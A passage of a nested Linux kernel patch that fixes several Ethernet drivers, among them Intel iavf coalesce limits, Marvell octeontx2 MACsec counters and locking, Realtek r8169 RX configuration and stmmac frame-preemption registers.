+--- a/drivers/net/ethernet/hisilicon/hns/hns_enet.h
++++ b/drivers/net/ethernet/hisilicon/hns/hns_enet.h
+@@ -44,7 +44,8 @@ struct hns_nic_ring_data {
+ struct hns_nic_ops {
+ 	void (*fill_desc)(struct hnae_ring *ring, void *priv,
+ 			  int size, dma_addr_t dma, int frag_end,
+-			  int buf_num, enum hns_desc_type type, int mtu);
++			  int buf_num, enum hns_desc_type type, int mtu,
++			  bool is_gso);
+ 	int (*maybe_stop_tx)(struct sk_buff **out_skb,
+ 			     int *bnum, struct hnae_ring *ring);
+ 	void (*get_rxd_bnum)(u32 bnum_flag, int *out_bnum);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 9f5824eb8808a..b4157ff370a31 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -16158,7 +16158,7 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	       I40E_PRTGL_SAH_MFS_MASK) >> I40E_PRTGL_SAH_MFS_SHIFT;
+ 	if (val < MAX_FRAME_SIZE_DEFAULT)
+ 		dev_warn(&pdev->dev, "MFS for port %x has been set below the default: %x\n",
+-			 i, val);
++			 pf->hw.port, val);
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index c13b4fa659ee9..31e02624aca48 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -829,18 +829,10 @@ static int __iavf_set_coalesce(struct net_device *netdev,
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	int i;
+ 
+-	if (ec->rx_coalesce_usecs == 0) {
+-		if (ec->use_adaptive_rx_coalesce)
+-			netif_info(adapter, drv, netdev, "rx-usecs=0, need to disable adaptive-rx for a complete disable\n");
+-	} else if ((ec->rx_coalesce_usecs < IAVF_MIN_ITR) ||
+-		   (ec->rx_coalesce_usecs > IAVF_MAX_ITR)) {
++	if (ec->rx_coalesce_usecs > IAVF_MAX_ITR) {
+ 		netif_info(adapter, drv, netdev, "Invalid value, rx-usecs range is 0-8160\n");
+ 		return -EINVAL;
+-	} else if (ec->tx_coalesce_usecs == 0) {
+-		if (ec->use_adaptive_tx_coalesce)
+-			netif_info(adapter, drv, netdev, "tx-usecs=0, need to disable adaptive-tx for a complete disable\n");
+-	} else if ((ec->tx_coalesce_usecs < IAVF_MIN_ITR) ||
+-		   (ec->tx_coalesce_usecs > IAVF_MAX_ITR)) {
++	} else if (ec->tx_coalesce_usecs > IAVF_MAX_ITR) {
+ 		netif_info(adapter, drv, netdev, "Invalid value, tx-usecs range is 0-8160\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.h b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+index 7e6ee32d19b69..10ba36602c0c1 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.h
+@@ -15,7 +15,6 @@
+  */
+ #define IAVF_ITR_DYNAMIC	0x8000	/* use top bit as a flag */
+ #define IAVF_ITR_MASK		0x1FFE	/* mask for ITR register value */
+-#define IAVF_MIN_ITR		     2	/* reg uses 2 usec resolution */
+ #define IAVF_ITR_100K		    10	/* all values below must be even */
+ #define IAVF_ITR_50K		    20
+ #define IAVF_ITR_20K		    50
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index a0c31f5b2ce05..03ebabd616353 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -1877,7 +1877,7 @@ struct mcs_hw_info {
+ 	u8 tcam_entries;	/* RX/TX Tcam entries per mcs block */
+ 	u8 secy_entries;	/* RX/TX SECY entries per mcs block */
+ 	u8 sc_entries;		/* RX/TX SC CAM entries per mcs block */
+-	u8 sa_entries;		/* PN table entries = SA entries */
++	u16 sa_entries;		/* PN table entries = SA entries */
+ 	u64 rsvd[16];
+ };
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index c43f19dfbd744..c1775bd01c2b4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -117,7 +117,7 @@ void mcs_get_rx_secy_stats(struct mcs *mcs, struct mcs_secy_stats *stats, int id
+ 	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYTAGGEDCTLX(id);
+ 	stats->pkt_tagged_ctl_cnt = mcs_reg_read(mcs, reg);
+ 
+-	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDORNOTAGX(id);
++	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDX(id);
+ 	stats->pkt_untaged_cnt = mcs_reg_read(mcs, reg);
+ 
+ 	reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYCTLX(id);
+@@ -215,7 +215,7 @@ void mcs_get_sc_stats(struct mcs *mcs, struct mcs_sc_stats *stats,
+ 		reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSCNOTVALIDX(id);
+ 		stats->pkt_notvalid_cnt = mcs_reg_read(mcs, reg);
+ 
+-		reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDOROKX(id);
++		reg = MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDX(id);
+ 		stats->pkt_unchecked_cnt = mcs_reg_read(mcs, reg);
+ 
+ 		if (mcs->hw->mcs_blks > 1) {
+@@ -1219,6 +1219,17 @@ struct mcs *mcs_get_pdata(int mcs_id)
+ 	return NULL;
+ }
+ 
++bool is_mcs_bypass(int mcs_id)
++{
++	struct mcs *mcs_dev;
++
++	list_for_each_entry(mcs_dev, &mcs_list, mcs_list) {
++		if (mcs_dev->mcs_id == mcs_id)
++			return mcs_dev->bypass;
++	}
++	return true;
++}
++
+ void mcs_set_port_cfg(struct mcs *mcs, struct mcs_port_cfg_set_req *req)
+ {
+ 	u64 val = 0;
+@@ -1436,7 +1447,7 @@ static int mcs_x2p_calibration(struct mcs *mcs)
+ 	return err;
+ }
+ 
+-static void mcs_set_external_bypass(struct mcs *mcs, u8 bypass)
++static void mcs_set_external_bypass(struct mcs *mcs, bool bypass)
+ {
+ 	u64 val;
+ 
+@@ -1447,6 +1458,7 @@ static void mcs_set_external_bypass(struct mcs *mcs, u8 bypass)
+ 	else
+ 		val &= ~BIT_ULL(6);
+ 	mcs_reg_write(mcs, MCSX_MIL_GLOBAL, val);
++	mcs->bypass = bypass;
+ }
+ 
+ static void mcs_global_cfg(struct mcs *mcs)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+index 0f89dcb764654..f927cc61dfd21 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+@@ -149,6 +149,7 @@ struct mcs {
+ 	u16			num_vec;
+ 	void			*rvu;
+ 	u16			*tx_sa_active;
++	bool                      bypass;
+ };
+ 
+ struct mcs_ops {
+@@ -206,6 +207,7 @@ void mcs_get_custom_tag_cfg(struct mcs *mcs, struct mcs_custom_tag_cfg_get_req *
+ int mcs_alloc_ctrlpktrule(struct rsrc_bmap *rsrc, u16 *pf_map, u16 offset, u16 pcifunc);
+ int mcs_free_ctrlpktrule(struct mcs *mcs, struct mcs_free_ctrl_pkt_rule_req *req);
+ int mcs_ctrlpktrule_write(struct mcs *mcs, struct mcs_ctrl_pkt_rule_write_req *req);
++bool is_mcs_bypass(int mcs_id);
+ 
+ /* CN10K-B APIs */
+ void cn10kb_mcs_set_hw_capabilities(struct mcs *mcs);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+index f3ab01fc363c8..f4c6de89002c1 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+@@ -810,14 +810,37 @@
+ 		offset = 0x9d8ull;			\
+ 	offset; })
+ 
++#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDX(a) ({	\
++	u64 offset;					\
++							\
++	offset = 0xee80ull;				\
++	if (mcs->hw->mcs_blks > 1)			\
++		offset = 0xe818ull;			\
++	offset += (a) * 0x8ull;				\
++	offset; })
++
++#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDX(a) ({	\
++	u64 offset;					\
++							\
++	offset = 0xa680ull;				\
++	if (mcs->hw->mcs_blks > 1)			\
++		offset = 0xd018ull;			\
++	offset += (a) * 0x8ull;				\
++	offset; })
++
++#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCLATEORDELAYEDX(a)	({	\
++	u64 offset;						\
++								\
++	offset = 0xf680ull;					\
++	if (mcs->hw->mcs_blks > 1)				\
++		offset = 0xe018ull;				\
++	offset += (a) * 0x8ull;					\
++	offset; })
++
+ #define MCSX_CSE_RX_MEM_SLAVE_INOCTETSSCDECRYPTEDX(a)	(0xe680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INOCTETSSCVALIDATEX(a)	(0xde80ull + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDORNOTAGX(a)	(0xa680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYNOTAGX(a)	(0xd218 + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYUNTAGGEDX(a)	(0xd018ull + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCUNCHECKEDOROKX(a)	(0xee80ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSECYCTLX(a)		(0xb680ull + (a) * 0x8ull)
+-#define MCSX_CSE_RX_MEM_SLAVE_INPKTSSCLATEORDELAYEDX(a) (0xf680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSAINVALIDX(a)	(0x12680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSANOTUSINGSAERRORX(a) (0x15680ull + (a) * 0x8ull)
+ #define MCSX_CSE_RX_MEM_SLAVE_INPKTSSANOTVALIDX(a)	(0x13680ull + (a) * 0x8ull)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 733add3a9dc6b..d88d86bf07b03 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -2622,6 +2622,9 @@ static void __rvu_flr_handler(struct rvu *rvu, u16 pcifunc)
+ 	 */
+ 	rvu_npc_free_mcam_entries(rvu, pcifunc, -1);
+ 
++	if (rvu->mcs_blk_cnt)
++		rvu_mcs_flr_handler(rvu, pcifunc);
++
+ 	mutex_unlock(&rvu->flr_lock);
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index a3346ea7876c5..95a7bc396e8ea 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -325,6 +325,7 @@ struct nix_hw {
+ 	struct nix_txvlan txvlan;
+ 	struct nix_ipolicer *ipolicer;
+ 	u64    *tx_credits;
++	u8	cc_mcs_cnt;
+ };
+ 
+ /* RVU block's capabilities or functionality,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+index dc7bd2ce78f7d..d609512998992 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+@@ -1285,7 +1285,7 @@ static int rvu_npa_register_reporters(struct rvu_devlink *rvu_dl)
+ 
+ 	rvu_dl->devlink_wq = create_workqueue("rvu_devlink_wq");
+ 	if (!rvu_dl->devlink_wq)
+-		goto err;
++		return -ENOMEM;
+ 
+ 	INIT_WORK(&rvu_reporters->intr_work, rvu_npa_intr_work);
+ 	INIT_WORK(&rvu_reporters->err_work, rvu_npa_err_work);
+@@ -1293,9 +1293,6 @@ static int rvu_npa_register_reporters(struct rvu_devlink *rvu_dl)
+ 	INIT_WORK(&rvu_reporters->ras_work, rvu_npa_ras_work);
+ 
+ 	return 0;
+-err:
+-	rvu_npa_health_reporters_destroy(rvu_dl);
+-	return -ENOMEM;
+ }
+ 
+ static int rvu_npa_health_reporters_create(struct rvu_devlink *rvu_dl)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 7310047136986..959f36efdc4a6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -12,6 +12,7 @@
+ #include "rvu_reg.h"
+ #include "rvu.h"
+ #include "npc.h"
++#include "mcs.h"
+ #include "cgx.h"
+ #include "lmac_common.h"
+ #include "rvu_npc_hash.h"
+@@ -4164,6 +4165,12 @@ static void nix_link_config(struct rvu *rvu, int blkaddr,
+ 			    SDP_HW_MAX_FRS << 16 | NIC_HW_MIN_FRS);
+ 	}
+ 
++	/* Get MCS external bypass status for CN10K-B */
++	if (mcs_get_blkcnt() == 1) {
++		/* Adjust for 2 credits when external bypass is disabled */
++		nix_hw->cc_mcs_cnt = is_mcs_bypass(0) ? 0 : 2;
++	}
++
+ 	/* Set credits for Tx links assuming max packet length allowed.
+ 	 * This will be reconfigured based on MTU set for PF/VF.
+ 	 */
+@@ -4187,6 +4194,7 @@ static void nix_link_config(struct rvu *rvu, int blkaddr,
+ 			tx_credits = (lmac_fifo_len - lmac_max_frs) / 16;
+ 			/* Enable credits and set credit pkt count to max allowed */
+ 			cfg =  (tx_credits << 12) | (0x1FF << 2) | BIT_ULL(1);
++			cfg |= FIELD_PREP(NIX_AF_LINKX_MCS_CNT_MASK, nix_hw->cc_mcs_cnt);
+ 
+ 			link = iter + slink;
+ 			nix_hw->tx_credits[link] = tx_credits;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 16cfc802e348d..f65805860c8d4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -389,7 +389,13 @@ static u64 npc_get_default_entry_action(struct rvu *rvu, struct npc_mcam *mcam,
+ 	int bank, nixlf, index;
+ 
+ 	/* get ucast entry rule entry index */
+-	nix_get_nixlf(rvu, pf_func, &nixlf, NULL);
++	if (nix_get_nixlf(rvu, pf_func, &nixlf, NULL)) {
++		dev_err(rvu->dev, "%s: nixlf not attached to pcifunc:0x%x\n",
++			__func__, pf_func);
++		/* Action 0 is drop */
++		return 0;
++	}
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pf_func, nixlf,
+ 					 NIXLF_UCAST_ENTRY);
+ 	bank = npc_get_bank(mcam, index);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c
+index b3150f0532919..d46ac29adb966 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.c
+@@ -31,8 +31,8 @@ static struct hw_reg_map txsch_reg_map[NIX_TXSCH_LVL_CNT] = {
+ 	{NIX_TXSCH_LVL_TL4, 3, 0xFFFF, {{0x0B00, 0x0B08}, {0x0B10, 0x0B18},
+ 			      {0x1200, 0x12E0} } },
+ 	{NIX_TXSCH_LVL_TL3, 4, 0xFFFF, {{0x1000, 0x10E0}, {0x1600, 0x1608},
+-			      {0x1610, 0x1618}, {0x1700, 0x17B0} } },
+-	{NIX_TXSCH_LVL_TL2, 2, 0xFFFF, {{0x0E00, 0x0EE0}, {0x1700, 0x17B0} } },
++			      {0x1610, 0x1618}, {0x1700, 0x17C8} } },
++	{NIX_TXSCH_LVL_TL2, 2, 0xFFFF, {{0x0E00, 0x0EE0}, {0x1700, 0x17C8} } },
+ 	{NIX_TXSCH_LVL_TL1, 1, 0xFFFF, {{0x0C00, 0x0D98} } },
+ };
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+index 39f7a7cb27558..b690e5566f12a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+@@ -434,6 +434,7 @@
+ 
+ #define NIX_AF_LINKX_BASE_MASK		GENMASK_ULL(11, 0)
+ #define NIX_AF_LINKX_RANGE_MASK		GENMASK_ULL(19, 16)
++#define NIX_AF_LINKX_MCS_CNT_MASK	GENMASK_ULL(33, 32)
+ 
+ /* SSO */
+ #define SSO_AF_CONST			(0x1000)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+index aaf1af2a402ec..af779ae40d3c2 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+@@ -323,9 +323,12 @@ static void otx2_get_pauseparam(struct net_device *netdev,
+ 	if (is_otx2_lbkvf(pfvf->pdev))
+ 		return;
+ 
++	mutex_lock(&pfvf->mbox.lock);
+ 	req = otx2_mbox_alloc_msg_cgx_cfg_pause_frm(&pfvf->mbox);
+-	if (!req)
++	if (!req) {
++		mutex_unlock(&pfvf->mbox.lock);
+ 		return;
++	}
+ 
+ 	if (!otx2_sync_mbox_msg(&pfvf->mbox)) {
+ 		rsp = (struct cgx_pause_frm_cfg *)
+@@ -333,6 +336,7 @@ static void otx2_get_pauseparam(struct net_device *netdev,
+ 		pause->rx_pause = rsp->rx_pause;
+ 		pause->tx_pause = rsp->tx_pause;
+ 	}
++	mutex_unlock(&pfvf->mbox.lock);
+ }
+ 
+ static int otx2_set_pauseparam(struct net_device *netdev,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 18c5d2b3f7f95..55807e2043edf 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1676,6 +1676,14 @@ static void otx2_do_set_rx_mode(struct otx2_nic *pf)
+ 	mutex_unlock(&pf->mbox.lock);
+ }
+ 
++static void otx2_set_irq_coalesce(struct otx2_nic *pfvf)
++{
++	int cint;
++
++	for (cint = 0; cint < pfvf->hw.cint_cnt; cint++)
++		otx2_config_irq_coalescing(pfvf, cint);
++}
++
+ static void otx2_dim_work(struct work_struct *w)
+ {
+ 	struct dim_cq_moder cur_moder;
+@@ -1691,6 +1699,7 @@ static void otx2_dim_work(struct work_struct *w)
+ 		CQ_TIMER_THRESH_MAX : cur_moder.usec;
+ 	pfvf->hw.cq_ecount_wait = (cur_moder.pkts > NAPI_POLL_WEIGHT) ?
+ 		NAPI_POLL_WEIGHT : cur_moder.pkts;
++	otx2_set_irq_coalesce(pfvf);
+ 	dim->state = DIM_START_MEASURE;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 20d801d30c732..aee392a15b23c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -510,11 +510,18 @@ static void otx2_adjust_adaptive_coalese(struct otx2_nic *pfvf, struct otx2_cq_p
+ {
+ 	struct dim_sample dim_sample;
+ 	u64 rx_frames, rx_bytes;
++	u64 tx_frames, tx_bytes;
+ 
+ 	rx_frames = OTX2_GET_RX_STATS(RX_BCAST) + OTX2_GET_RX_STATS(RX_MCAST) +
+ 		OTX2_GET_RX_STATS(RX_UCAST);
+ 	rx_bytes = OTX2_GET_RX_STATS(RX_OCTS);
+-	dim_update_sample(pfvf->napi_events, rx_frames, rx_bytes, &dim_sample);
++	tx_bytes = OTX2_GET_TX_STATS(TX_OCTS);
++	tx_frames = OTX2_GET_TX_STATS(TX_UCAST);
++
++	dim_update_sample(pfvf->napi_events,
++			  rx_frames + tx_frames,
++			  rx_bytes + tx_bytes,
++			  &dim_sample);
+ 	net_dim(&cq_poll->dim, dim_sample);
+ }
+ 
+@@ -555,16 +562,9 @@ int otx2_napi_handler(struct napi_struct *napi, int budget)
+ 		if (pfvf->flags & OTX2_FLAG_INTF_DOWN)
+ 			return workdone;
+ 
+-		/* Check for adaptive interrupt coalesce */
+-		if (workdone != 0 &&
+-		    ((pfvf->flags & OTX2_FLAG_ADPTV_INT_COAL_ENABLED) ==
+-		     OTX2_FLAG_ADPTV_INT_COAL_ENABLED)) {
+-			/* Adjust irq coalese using net_dim */
++		/* Adjust irq coalese using net_dim */
++		if (pfvf->flags & OTX2_FLAG_ADPTV_INT_COAL_ENABLED)
+ 			otx2_adjust_adaptive_coalese(pfvf, cq_poll);
+-			/* Update irq coalescing */
+-			for (i = 0; i < pfvf->hw.cint_cnt; i++)
+-				otx2_config_irq_coalescing(pfvf, i);
+-		}
+ 
+ 		/* Re-enable interrupts */
+ 		otx2_write64(pfvf, NIX_LF_CINTX_ENA_W1S(cq_poll->cint_idx),
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index 93a4258421667..13dfcf9f75dad 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -214,7 +214,7 @@ struct ionic_desc_info {
+ 	void *cb_arg;
+ };
+ 
+-#define IONIC_QUEUE_NAME_MAX_SZ		32
++#define IONIC_QUEUE_NAME_MAX_SZ		16
+ 
+ struct ionic_queue {
+ 	struct device *dev;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index a89ab455af67d..f7634884c7508 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -46,24 +46,24 @@ static void ionic_lif_queue_identify(struct ionic_lif *lif);
+ static void ionic_dim_work(struct work_struct *work)
+ {
+ 	struct dim *dim = container_of(work, struct dim, work);
++	struct ionic_intr_info *intr;
+ 	struct dim_cq_moder cur_moder;
+ 	struct ionic_qcq *qcq;
++	struct ionic_lif *lif;
+ 	u32 new_coal;
+ 
+ 	cur_moder = net_dim_get_rx_moderation(dim->mode, dim->profile_ix);
+ 	qcq = container_of(dim, struct ionic_qcq, dim);
+-	new_coal = ionic_coal_usec_to_hw(qcq->q.lif->ionic, cur_moder.usec);
++	lif = qcq->q.lif;
++	new_coal = ionic_coal_usec_to_hw(lif->ionic, cur_moder.usec);
+ 	new_coal = new_coal ? new_coal : 1;
+ 
+-	if (qcq->intr.dim_coal_hw != new_coal) {
+-		unsigned int qi = qcq->cq.bound_q->index;
+-		struct ionic_lif *lif = qcq->q.lif;
+-
+-		qcq->intr.dim_coal_hw = new_coal;
++	intr = &qcq->intr;
++	if (intr->dim_coal_hw != new_coal) {
++		intr->dim_coal_hw = new_coal;
+ 
+ 		ionic_intr_coal_init(lif->ionic->idev.intr_ctrl,
+-				     lif->rxqcqs[qi]->intr.index,
+-				     qcq->intr.dim_coal_hw);
++				     intr->index, intr->dim_coal_hw);
+ 	}
+ 
+ 	dim->state = DIM_START_MEASURE;
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index abfa375b08878..d22457f2cf9cf 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -193,6 +193,7 @@ enum rtl_registers {
+ 					/* No threshold before first PCI xfer */
+ #define	RX_FIFO_THRESH			(7 << RXCFG_FIFO_SHIFT)
+ #define	RX_EARLY_OFF			(1 << 11)
++#define	RX_PAUSE_SLOT_ON		(1 << 11)	/* 8125b and later */
+ #define	RXCFG_DMA_SHIFT			8
+ 					/* Unlimited maximum PCI burst. */
+ #define	RX_DMA_BURST			(7 << RXCFG_DMA_SHIFT)
+@@ -2237,9 +2238,13 @@ static void rtl_init_rxcfg(struct rtl8169_private *tp)
+ 	case RTL_GIGA_MAC_VER_40 ... RTL_GIGA_MAC_VER_53:
+ 		RTL_W32(tp, RxConfig, RX128_INT_EN | RX_MULTI_EN | RX_DMA_BURST | RX_EARLY_OFF);
+ 		break;
+-	case RTL_GIGA_MAC_VER_61 ... RTL_GIGA_MAC_VER_63:
++	case RTL_GIGA_MAC_VER_61:
+ 		RTL_W32(tp, RxConfig, RX_FETCH_DFLT_8125 | RX_DMA_BURST);
+ 		break;
++	case RTL_GIGA_MAC_VER_63:
++		RTL_W32(tp, RxConfig, RX_FETCH_DFLT_8125 | RX_DMA_BURST |
++			RX_PAUSE_SLOT_ON);
++		break;
+ 	default:
+ 		RTL_W32(tp, RxConfig, RX128_INT_EN | RX_DMA_BURST);
+ 		break;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+index e95d35f1e5a0c..8fd167501fa0e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+@@ -710,28 +710,22 @@ void dwmac5_est_irq_status(void __iomem *ioaddr, struct net_device *dev,
+ 	}
+ }
+ 
+-void dwmac5_fpe_configure(void __iomem *ioaddr, u32 num_txq, u32 num_rxq,
++void dwmac5_fpe_configure(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			  u32 num_txq, u32 num_rxq,
+ 			  bool enable)
+ {
+ 	u32 value;
+ 
+-	if (!enable) {
+-		value = readl(ioaddr + MAC_FPE_CTRL_STS);
+-
+-		value &= ~EFPE;
+-
+-		writel(value, ioaddr + MAC_FPE_CTRL_STS);
+-		return;
++	if (enable) {
++		cfg->fpe_csr = EFPE;
++		value = readl(ioaddr + GMAC_RXQ_CTRL1);
++		value &= ~GMAC_RXQCTRL_FPRQ;
++		value |= (num_rxq - 1) << GMAC_RXQCTRL_FPRQ_SHIFT;
++		writel(value, ioaddr + GMAC_RXQ_CTRL1);
++	} else {
++		cfg->fpe_csr = 0;
+ 	}
+-
+-	value = readl(ioaddr + GMAC_RXQ_CTRL1);
+-	value &= ~GMAC_RXQCTRL_FPRQ;
+-	value |= (num_rxq - 1) << GMAC_RXQCTRL_FPRQ_SHIFT;
+-	writel(value, ioaddr + GMAC_RXQ_CTRL1);
+-
+-	value = readl(ioaddr + MAC_FPE_CTRL_STS);
+-	value |= EFPE;
+-	writel(value, ioaddr + MAC_FPE_CTRL_STS);
++	writel(cfg->fpe_csr, ioaddr + MAC_FPE_CTRL_STS);
+ }
+ 
+ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev)
+@@ -741,6 +735,9 @@ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev)
+ 
+ 	status = FPE_EVENT_UNKNOWN;
+ 
++	/* Reads from the MAC_FPE_CTRL_STS register should only be performed
++	 * here, since the status flags of MAC_FPE_CTRL_STS are "clear on read"
++	 */
+ 	value = readl(ioaddr + MAC_FPE_CTRL_STS);
+ 
+ 	if (value & TRSP) {
+@@ -766,19 +763,15 @@ int dwmac5_fpe_irq_status(void __iomem *ioaddr, struct net_device *dev)
+ 	return status;
+ }
+ 
+-void dwmac5_fpe_send_mpacket(void __iomem *ioaddr, enum stmmac_mpacket_type type)
++void dwmac5_fpe_send_mpacket(void __iomem *ioaddr, struct stmmac_fpe_cfg *cfg,
++			     enum stmmac_mpacket_type type)
+ {
+-	u32 value;
++	u32 value = cfg->fpe_csr;
+ 
+-	value = readl(ioaddr + MAC_FPE_CTRL_STS);
+-
+-	if (type == MPACKET_VERIFY) {
+-		value &= ~SRSP;
++	if (type == MPACKET_VERIFY)
+ 		value |= SVER;
+-	} else {
+-		value &= ~SVER;
++	else if (type == MPACKET_RESPONSE)
+ 		value |= SRSP;
+-	}
+ 
+ 	writel(value, ioaddr + MAC_FPE_CTRL_STS);
+ }
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.h b/drivers/net/ethernet/stmicro/stmmac/dwmac5.h
+index 53c138d0ff480..34e620790eb37 100644
